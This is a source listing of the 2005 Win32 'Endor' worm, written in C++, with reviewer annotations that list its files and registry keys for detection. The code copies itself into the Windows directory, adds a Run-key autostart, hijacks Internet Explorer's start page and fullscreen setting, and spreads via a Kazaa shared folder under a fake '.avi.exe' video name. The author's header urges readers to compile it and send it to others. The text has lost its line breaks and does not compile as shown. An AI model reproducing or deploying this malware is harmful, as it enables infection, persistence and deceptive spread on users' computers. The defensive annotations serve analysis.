source - worm.win32.small.h
endor.cpp
/*================================================= =============== Endor-Worm by Bobfan Version 1.1 30/05/05
################ The Script Kiddie Foundation ##### #################################### presents: ############## ############ WIN32.ENDOR - A fresh Computer-Worm #### Written in C++ by Bobfan ##################################################### ############################################################# ########### ## Hey wussup? ## This is Endor, a Worm written in C++... ## If you wanna build up ur own this is the right pa ckage! ## Do whatever u wanna do! ## ## PeazZ, Bobfan ## #################################################### ########################## Instructions to compile: ######### ########### ## Instructions to compile (C++ Builder): ## Extract cbuilder_src.zip ## Open up endor.bpr into Borland C++ Builder ## Compile&build it! ## Now send this compiled file to all the kiddies ou t there! ## ## Instructions to compile (DevC++): ## Extract devcpp_src.zip ## Open up endor.dev into DevC++ ## Compile it ## Now send this compiled file to all the kiddies ou t there! ## #################################################### ################################# Features: ################# ########### # # Features: ## Autostart in Registry ## Change Internet Explorer's URL ## Drop copies of itself into the Windows-Directory ## Sets Internet-Explorer to Fullscreen ## Spread it into Kazaa-Network ## Shutdown the Computer (disabled but you can enabl e it ## by changing the source code) #################################################### ################################### License ################# ########### ## Feel free to do whatevery you want with it! ## Released by Script Kiddie Foundation ## Project is (c) 2005 by SKF ## "Our hobby is your computer's end" :-P ## #################################################### #################################### Thanks ################# ########### ## Big thanks to: Retro, Gandro, Amok-One, Sebi, ## Commodore-Freak, Joe, Reaper, OSBetaArchive, Winh istory ## and many more! 
#################################################### #################################### Bobfan ################# ##########
=================================================== ===============*/
// Include headers#include <windows.h>#include <string.h>#include <fstream>
// Define the new Registry Values
// NOTE(review): this transcript lost the line breaks that followed `//` comments, so in
// several places a statement is fused onto the comment line before it. Read such lines as
// "comment, then code"; the text is not compilable as shown.
// reg and reg1 are the data buffers passed to the RegSetValueEx calls in WinMain that write
// the Internet Explorer "Start Page" and "FullScreen" values under HKEY_CURRENT_USER.
unsigned char reg [ 40] = "http://www.stringtangafun.de/index.php" ; // New Start-URL of IE
unsigned char reg1 [ 4] = "yes" ; // Fullscreen IE
// unsigned char reg2[10] = ""; // Not Used
// windir (declaration fused into the comment below) is a file-scope MAX_PATH buffer. WinMain
// fills it with the Windows directory and appends "\win.exe" to form the drop path.
// Define windirchar windir [ MAX_PATH];
// WinMain: entry point of the sample. As shown on this page it copies its own executable to
// <Windows directory>\win.exe, writes several values under HKEY_CURRENT_USER, shows a message
// box, and copies itself into a file-sharing folder under a media-looking file name.
// No API return value is checked in the visible code (nRet is assigned but never read).
// Host artifacts named in this listing, usable for detection and cleanup:
//   file      <Windows directory>\win.exe
//   file      C:\My Shared Folder\starwars-episode3_full_rippe d_by_antrax.avi.exe
//             (".avi.exe" double extension; the space inside "rippe d" is presumably an
//             extraction artifact - confirm against a sample before using it as an indicator)
//   registry  HKCU\Software\Bobfan, value "Endor"
//   registry  HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Endor"
//   registry  HKCU\Software\Microsoft\Internet Explorer\Main, values "Start Page", "FullScreen"
// Begin of Main-Codeint APIENTRY WinMain ( HINSTANCE hInstance , HINSTANCE hPrevInstance , LPSTR lpCmdLine , intnCmdShow){
// Resolves the Windows directory into windir and the running image's own path into pathname
// (GetModuleHandle(NULL) + GetModuleFileName with a 256-byte buffer).
// Get the Windows Directory and Registrychar pathname [ 256 ];GetWindowsDirectory ( windir , sizeof ( windir ));HMODULE hMe= GetModuleHandle ( NULL);DWORD nRet= GetModuleFileName ( hMe, pathname , 256 );HKEY hKey;
// Self-copy: windir becomes "<Windows directory>\win.exe" and is the CopyFile destination.
// The third argument 0 is bFailIfExists = FALSE, so an existing win.exe is overwritten.
// Copy the worm to c:\windows\win.exestrcat ( windir , "\\win.exe" );CopyFile ( pathname , windir , 0);
// Marker value: HKCU\Software\Bobfan\"Endor" holds the drop path. cbData is sizeof(windir),
// so the stored data is the whole MAX_PATH buffer, not just the path string. No RegCloseKey
// follows; hKey is reused by the next RegCreateKey.
// Register Endor in the RegistryRegCreateKey ( HKEY_CURRENT_USER, "Software\\Bobfan" , & hKey);RegSetValueEx ( hKey , "Endor" , 0, REG_SZ, ( LPBYTE) windir , sizeof ( windir ));
// Browser setting change: "Start Page" is set to the URL held in reg (REG_SZ).
// Change Start Page of the Internet ExplorerRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main" ,& hKey);RegSetValueEx ( hKey , "Start Page" , 0, REG_SZ, reg , sizeof ( reg ));RegCloseKey ( hKey);
// Browser setting change: "FullScreen" is set to the string in reg1 ("yes").
// Change Internet Explorer to FullscreenRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main" ,& hKey);RegSetValueEx ( hKey , "FullScreen" , 0, REG_SZ, reg1 , sizeof ( reg1 ));RegCloseKey ( hKey);
// Dead code: the three calls on the next line are commented out in the original.
// Not Used Registry Hack// RegCreateKey (HKEY_CURRENT_USER, "Not used",&hKe y);// RegSetValueEx (hKey,"Nothing", 0, REG_SZ, reg2, sizeof(reg2));// RegCloseKey(hKey);
// User-visible dialog titled "Endor 1.1"; the string literal spans the next two transcript lines.
//Show a Message-BoxMessageBox ( 0, "This Computer has been hacked by SKF... Man, you s houldn't trust every
program you run!\nThank you for your support you du mbass n00b!\n\nKnowledge is power, but not everybody has the power!" , "Endor 1.1" , MB_ICONEXCLAMATION| MB_OK);
// Persistence: a per-user Run value named "Endor" pointing at the win.exe drop path. It is
// written with sizeof(windir) as the data length, as above. No RegCloseKey is visible after it.
// Autostart EndorRegCreateKey ( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run" , & hKey);RegSetValueEx ( hKey , "Endor" , 0, REG_SZ, ( LPBYTE) windir , sizeof ( windir ));
// Propagation relies on a hard-coded share path and a file name that looks like a video but
// ends in ".exe". The call's final argument appears further down in the transcript.
// Copy the worm to Kazaa's Shared Folder to spread on the NetworkCopyFile ( pathname , "C:\\My Shared Folder\\starwars-episode3_full_rippe d_by_antrax.avi.exe" ,
0);
// The 0 above is the last argument (bFailIfExists = FALSE) of the CopyFile call that targets
// the shared folder, so an existing file of the same name is overwritten.
// NOTE(review): the InitiateSystemShutdown call on the next line is commented out in this
// listing, so the sample as shown does not shut down or reboot the host.
// Reboot the Computer (Remove the // before the ne xt line to enable it)// InitiateSystemShutdown(0, 0, 0, TRUE, FALSE);
// The closing brace of WinMain is fused into the trailing comment on the line below.
return 0; // Exit the Application}